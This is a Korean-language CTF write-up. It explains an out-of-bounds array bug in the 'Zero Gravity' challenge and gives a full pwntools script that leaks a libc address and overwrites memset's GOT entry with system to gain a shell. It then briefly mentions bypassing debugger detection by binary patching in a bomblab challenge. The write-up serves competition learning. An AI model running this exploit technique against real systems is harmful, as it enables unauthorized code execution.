2022 Fall GoN Open Qual CTF Writeup
2022 Fall Gon Open Qual CTF imssm99 (2nd, 11427 pts) A. Zero Gravity Vulnerability idx를 입력받을 때 값을 검사하지 않아 OOB가 일어나게 된다. a, r을 통해 임의의 주소에 float 형식으로 값을 더하거나 읽을 수 있다. cnt = 1; for ( i = 0; i < cnt; ++i ) { printf("(r)ead / (a)dd >> "); scanf("%2s", &s); if ( (char)s == 'a' ) { printf(" idx >> "); scanf("%d", &idx); printf(" value >> "); scanf("%f", &value); arr[idx] = value + arr[idx]; } else if ( (char)s == 'r' ) { printf(" idx >> "); scanf("%d", &idx); printf("%.10e\n", arr[idx]); } memset(&s, 0, 3uLL); } /* .got.plt:0x601028 = memset .got.plt:0x601030 = setvbuf .bss:0x6010A0 = arr .bss:0x6010E0 = cnt */ Exploit 먼저 cnt를 조작하여 for loop가 여러 번 돌도록 한다. arr[-28]을 읽어 setvbuf@got의 lower 4byte를 읽어 system함수의 주소를 알아낸다. arr[-30]에 값을 더해 memset@got를 system함수의 주소로 덮어쓴다. memset(&s, 0, 3uLL)에서 system(&s)가 실행되어 원하는 명령을 입력할 수 있다. from pwn import * import struct itof = lambda x: struct.unpack("<f", struct.pack("<L", x))[0] ftoi = lambda x: struct.unpack("<L", struct.pack("<f", x))[0] elf = ELF("./zero_gravity") libc = ELF("./libc.so.6") p = remote("host1.dreamhack.games", 20267) #p = process("./zero_gravity") def read(idx): p.sendlineafter(b">> ", b"r") p.sendlineafter(b">> ", str(idx).encode()) return ftoi(float(p.recvline())) def add(idx, value): p.sendlineafter(b">> ", b"a") p.sendlineafter(b">> ", str(idx).encode()) p.sendlineafter(b">> ", str(value).encode()) add(16, 0x10) # cnt+=0x10 l = read(-30) lp = itof(l) t = read(-28) - libc.symbols["setvbuf"] + libc.symbols["system"] tp = itof(t) print(hex(l), lp) print(hex(t), tp) add(-30, tp-lp) print(hex(read(-30))) p.interactive() B. Bomblab - Hard Level 1 ~ Level 6은 정적 분석을 통해 풀었고, Secret Phase는 Binary Patch를 통해 디버거 탐지를 우회한 뒤 GDB를 이용해 동적으로 분석했다. ...